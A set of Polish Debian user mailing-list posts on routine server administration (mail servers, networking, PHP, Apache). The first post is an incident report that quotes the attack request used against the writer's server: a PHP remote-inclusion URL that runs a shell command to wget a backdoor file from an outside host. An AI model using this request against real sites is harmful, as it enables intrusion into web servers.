Zhackowano mnie! Data Cha0s PHP Command
Witam wszystkich, zauważyłęm dzisiaj, że zhackowano mi debiana 2.4.26, poprzez dziurę w php. Panowie przybyli z Brazylii i używając skryptu http://1ncident.100free.com/cse.jpg dostali się do konsoli (całe szczęście jako www-data). Nie narobili żadnych szków oprócz faktu, że uruchomili skrypt w perlu ktry zabierał 99% zasobów (to było połączenie do irca), tak czy siak, jak sprawdzam, to mimo upgradu perla, php, apacha to dziura i tak pozostaje. Tworząc odpowiedznio zapytanie do PHP, konkretnie to index.php?akcja=http://1ncident.100free.com/cse.jpg?cmd=cd%20/tmp%20;%20wget%20www.quacks.info/rm-rf/bd.txt mogą wciąż pobrać skrypcik, lub wykonać polecenie konsoli. Narazie poprostu zdjąłem niebezpieczny kod ze strony www, a właściwie całą www aby zapobiec dalszemu logowaniu się. W necie jest trochę materiałów - żalenia się, jednak na żaden zdecydowany sposób poradzenia sobie z problemem nie trafiłem. Może ktos już powalczył z tym trochę i chciałby się podzielić wrażeniami. http://www.chovy.com/2005/02/simiens-crew-2005-how-they-did-it.html http://vil.nai.com/vil/content/v_129568.htm pozdrowienia, Lucas -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Postfix i port 110 - jeszcze raz
- Original Message - From: Piotr Konieczny [EMAIL PROTECTED] To: Piotr Król [EMAIL PROTECTED] Cc: debian-user-polish@lists.debian.org Sent: Monday, May 10, 2004 1:43 PM Subject: Re: Postfix i port 110 - jeszcze raz On Mon, 10 May 2004, Piotr Król wrote: Bardzo dziękuje za wszystkie odpowiedzi. Jeszcze jedno pytanie jak się nazywa pakiet w debianie obsługujący pop3. Jestem początkującym użytkownikiem używam apt-get install co mam tu wpisać apt-cache search pop3 | grep server Piotr Konieczny Najprostszy chyba jest qpopper - Enhanced Post Office Protocol server (POP3). apt-get install qpopper Lucas
procmail - ustawienia globalne
Witam, nie moge sobie poradzic z odpaleniem procmaila globalnie, tzn. $HOME\.procmailrc dziala prawidlowo, ale musialbym kazdemu userowi robic osobny plik.procmailrc co mi b. nieodpowiada. Wiem, ze procmail moze globalnie korzystac z pliku /etc/procmailrc, ale nie robi tego. Robilem juz /usr/bin/procmail -pm /etc/procmailrc, ale nie robil nic i dopiro CTRL-C daje mi komunikat "procmail: Terminating prematurely". Jakies pomysly ? procmail v3.22 2001/09/10 thnx za jakiekolwiek info, Lucas
Re: oe i vir
Ale dlaczego wirusy sa posylane na liste debianowa Chyba zakaz uzywania outluka bylby jak najbardziej na miejscu... Pozdrawiam Michal Sorki to ja jestem winowajcą tego zamętu wkradło mi się świństwo na winzgrozę
Re: dynamiczny podzial lacza
jak najprosciej zrobic dynamiczny podzial lacza, tak aby powiedzmy czesc ludzi mogla korzystac tylko z 75 % lacza tak zeby dla jednej osoby :) zawsze zostalo wlne te 25 % ?? google.com --- shaper
Włam ....
Witam, wkradłmi się na serwer jakiś rozbujnik, przez dziurę w osp q3 (podejrzewam), niestety nie moge sprawdzic jak, bo wykasowal caly katalog z logami. Czy da się go jeszcze odzyskać, zna ktoś może jakieś sposoby ?? thx, Lucas
Odp: phpbb + postgres 7.x
A więca sam sobie odpowiadam, zamiast localhost trzeba było wpisać 127.0.0.1 Warning: Unable to connect to PostgreSQL server: FATAL 1: IDENT authentication failed for user "news" in /var/www/db/postgres7.php on line 79 phpBB : Critical Error Could not connect to the database
ping + DUP!
witam wiem że to rzadki problem, ale połączyłem sieci radiolkami, i gdy pinguję się za komputery w drugiej sieci, wyrzuca mi ping 192.168.8.52 64 bytes from 192.168.8.52: icmp_seq=2 ttl=128 time=4.7 ms (DUP!) ping -R 192.168.8.52 PING 192.168.8.52 (192.168.8.52): 56 data bytes64 bytes from 192.168.8.52: icmp_seq=0 ttl=128 time=2.8 msRR: oryks.hnet.pl (192.168.8.1) moskwa (192.168.8.52) oryks.hnet.pl (192.168.8.1)64 bytes from 192.168.8.52: icmp_seq=1 ttl=128 time=2.7 ms (same route)64 bytes from 192.168.8.52: icmp_seq=2 ttl=128 time=3.4 ms (same route)64 bytes from 192.168.8.52: icmp_seq=2 ttl=128 time=4.7 ms (DUP!) (same route)64 bytes from 192.168.8.52: icmp_seq=3 ttl=128 time=2.7 ms (same route)64 bytes from 192.168.8.52: icmp_seq=4 ttl=128 time=2.7 ms (same route) jak się pozbyć takiego echa ???, w sieci nie ma "stupid hubs" jedynie switche. Po obu stronach jest maska 255.255.255.128] tcpdump nie pokazuje nic dziwnego (jak dla mnie), trochę wp.pl (5% zgubione). Czy możliwe jest że anteny są źle zestawione (DNS192.168.0.1 jest na kolejnej antenie). thx za zainteresowanie .. Lucas
Re: ssh_exchange_identification: Connection closed by remote host
ja tak mialem z debianem (lub frbsd, nie pamietam) i nie mam pojacie cio to bylo, ale samo przeszlo... zalogowalem sie z innej masyzny i poszlo.. wez zobacz m-ce na dyskach... tomek chyab doszedlem ze jest to cos z DNS'em, juz mecze mojego isp... jest odwzorowanie: ip-dns natomiast brak w druga strone: dns-ip mysle ze to jest problemem... to ja jeszcze raz z tym /etc/hosts.allow i /etc/hosts.deny ;) czy na tych serverkach nie masz przypadkiem wpisiku w .deny ALL: PARANOID ? Hmmm, w katalogach domowych użytkowników są w katalogu ssh jest plik known_hosts może poprostu używają różnych kluczy, wyczyść ten plik i spróbuj ( zrób kopie oczywiście ), ale ja bym z tym raczej kombinował. Powodzenia, Lucas
php4 + apache
Witam wszystkich ... Mam taki problemin, dziś w nocy coś złego stało się z serwerkiem moim ... ;-((, mianowicie, jest coś nie tak z php. Jak odpalam stronkę, to index.php pokazywał się w kodzie, nie wiem czemu, więc poprostu przeinstalowałem php, i teraz, . chce zapisać plik index.php jest wpisany jako pierwszy w srm.conf ( DirectoryIndex index.php index.phtml index.html index.htm ). Wszelkie pliku typu .htm działają poprawnie, czy ktoś wie co z tym zrobić ??? thx, Łukasz
Re: php4 + apache
a czy masz wlaczona obsluge php w apache wlaczona? tomcio dogrzebałem się . i właśnie nie rozumiem czemu ( była oczywiście wyłączona, # libphp4.so ). Nie ma śladów włamu, wczoraj działało, a dzisiaj nagle się zahaszowało ... Nie wykluczam osób trzecich ( nie tylko ja mam roota ). Ale sprawa raczej dziwna, bo ani php nie było tykane ( wszystkie pliki były obecne ... ), jedynie co to phppgadminia instalowałem, ale to przecierż nie ma nic do rzeczy, zwłaszcza, że jak wychodziłem wczoraj w pracy to działało, a logi pokazuję że 0 3 w nocy przestał otwierać pliki , a o tej godz. znowu nikt się nie logował O co tu chodzi ?? idę pogrzebać. PS. Mój wielki błąd że odrazu tego nie sprawdziłem, a po godz. , ale kto by podejrzewał, skoro samo php4 było, to modułu już nie sprawdzałem, e, człowiek durny jest ... thx za zainteresowanie, Lucas
TPSA, Polpak, DSL
Witam ponownie grupowiczów ;-) Czy ktoś może używa łącza stałego z TPSA ?? Chcę wraz ze znajomymi (14 osób) wziąć z TPSA usługę o nazwie DSL 1 Mbit http://www.telekomunikacja.pl/biznes/msp/dsl/, czy może ktoś już używał tego łącza, jest ono niewiarygodnie tanie , bo 694 zł brutto, i ma się cenowo nijak do 1 Mbit z Polpaku-T, FRAME RELAY, ATM. Czy ktoś może mi wytłumaczyć czym się różnią te łącza. dlaczego np. 64 Kbit symetrycznym łączem jest o tylledroższe od 1 Mbit na DSL'u ??? Jakie byście wybrali łącze dla grupy 14 osobowej, nadmienię jeszcze, że miałby to być Gdańsk, i nieograniczam się tylko i wyłącznie do TPSA. thx, za wskazówki Lucas
Re: DNS.
Nie wiem, jak zabrac sie za konfigurację DNS. Czy może mi ktoś polecić łatwe how-to, lub stronkę typu www.debian.otwarte.pl, gdzie mógłbym poczytać, jak wszystko postawić? http://zlobek.tcz.wroclaw.pl/dzial.php3?dzial=10 Serdecznie proszę o wszelkie sugestie. I jeszcze jedno. Nie należę do grona eksperów linuxa..:)) dlatego właśnie żłobek, pozatym nie martw się ja też jestem noga Lucas
obciążenie
Witam, mam bardzo podstawowe pytanko, jak sprawdzić aktualne obciążenie serwera ( nie chodzi mi o mrtg ), tylko coś ala miernik zasobów z winzgrozy. Tak aby pokazywało aktualne użycie procesora, pamięci ... thx Łukasz
rlt 8139
Witam, mam pytanko, związane z kartą 10/100. Zmieniłem kartę na 100, i transfer odbioru na servie zwiększył się faktycznie około 5-6 razy, natomiast nie potrafi wysłać z taką prędkością, a właściwie to grubo zwolnił, ciężko mu się cokolwiek wysyła, mp3 o wadze 4 MB idzie 3-4 min. Czy jest to na 100 % trafiona karta, czy można coś pokombinować ?. Poprzednio używałem rlt 8029. Obsługa 8139, jest wkompilowana w jajko 2.4.19. debian 3.0 woody. thx, za podpowiedzi, bo nie wiem, czy grzebać dalej, czy zminić kartę??
Exim + Maildir a dostarczanie, próba 2
Sorki że się powtarzam, ale może ktoś już rozwiązywał taki problem : chcę przenieść pocztę z var/spool/mail do katalogów domowych. No i wrzuca pocztę do katalogu domowego użytkownika, zarówno gdy używam Maildira, jak również bez. Gdy w eximie podaję file = ${home}/${local_part}, (nie używając maildira) elegancko wrzuca do katalogu domowego użytkownika, dokładnie tak jak do var/spool/mail , ale tylko wrzuca, nie informuje, że doszła nowa poczta, ani jej nie odczytuje. Poprostu siedzi sobie plik w katalogu domowym. Zacząłem więc próbować przez Maildir'a, ustawiłem local_delivery: driver = appendfile group = mail mode = 0660 mode_fail_narrower = false envelope_to_add = true directory = ${home}/Maildir #file = /var/spool/mail/${local_part} address_directory: driver = appendfile no_from_hack prefix = suffix = maildir_format = yes no i tworzy się katalog Maildir, a do niego dochodzi poczta : test-1:/home/lucas/Maildir# ls q18JAN1-001A3M test-1:/home/lucas/Maildir# ale też nie huczy i nie buczy że ma pocztę. Nie da jej się odebrać. Za to z wysyłaniem z konta wszystko jest ok. W skrócie wygląda to tak, poczta dochodzi, tylko nie informuje o tym, poprostu jest plik z ./home/user/Maildir. Katalog Maildir stworzył się automatycznie. Prawa dostępu do katalogu i do pliku ok. ( user mail ). Lucas
Re: skrypt otwierający dodatkową stronę
chcę, aby otworzył mi się w drugim okienku baner z animacją. Dokładnie tak jak np. na prv.pl otwierają się reklamy . Sprawdź jak to robi prv.pl. tylko, że jak nawet skopiuję cały kod z prv.pl , to u mnie nie działa tzn. działa stronka główna : HTML HEAD LINK REL=SHORTCUT ICON HREF=http://www.icpnet.pl/~piotr3/klanowa/ico.ico; titleCzarne Pantery/title meta name=robots content=ALL meta name=description content= meta name=author content=Vertauris meta name=keywords content= script language=javascript1.2 src=http://adnet.hit.gemius.pl/[EMAIL PROTECTED]/scr ipt/head frameset framespacing=0 border=0 frameborder=0 rows=100%,* noresize frame name=q4rine noresize src=http://www.icpnet.pl/~piotr3/klanowa/zapas.html; /frameset /html ale script się nie uruchamia .. .
Re: skrypt otwierający dodatkową stronę
- Original Message - From: Paweł Tęcza [EMAIL PROTECTED] To: Debian debian-user-polish@lists.debian.org Sent: Thursday, November 28, 2002 12:30 PM Subject: Re: skrypt otwierający dodatkową stronę dokładnie o to, przydało sie width,height, itd. No to sie ciesze. Byc moze przed wywolaniem tej funkcji trzeba dodac jeszcze slowko return, ale nie chce mi sie teraz zagladac do dokumentacji na temat onload. W kazdym badz razie u mnie, pod Opera, to dziala i bez tego. u mnie też ;- www.wzr.pl
Re: Exim
smtp_verify = true relay_domains = false host_accept_relay = twoja sieć np.153.19.121.0/24:localhost:*.pl Tym ograniczysz spam 'tylko' do wysyłanego z Polski... Dla użytkowników spoza sieci lokalnej trzeba zrobić autoryzację, inaczej się nie da. http://www.exim.org/exim-html-3.30/doc/html/spec.html smtp_verify = true Type: boolean Default: false If this option is true, the SMTP command VRFY is supported on incoming SMTP connections; otherwise it is not. można jeszcze oczywiście ustawić AUTH_CRAM_MD5=yes AUTH_PLAINTEXT=yes
Re: Debian rules...na wielu komputerach?
a ja bym poprostu użył Norto Ghost'a ! zainstalował debiana ja jednym kompie, a potem tylko zrobił na jakiejś windzie dyskietkę do ghosta i przekładał dysk do następnego.Potem tylko wybrać disk to disk, 5 min. i gotowe.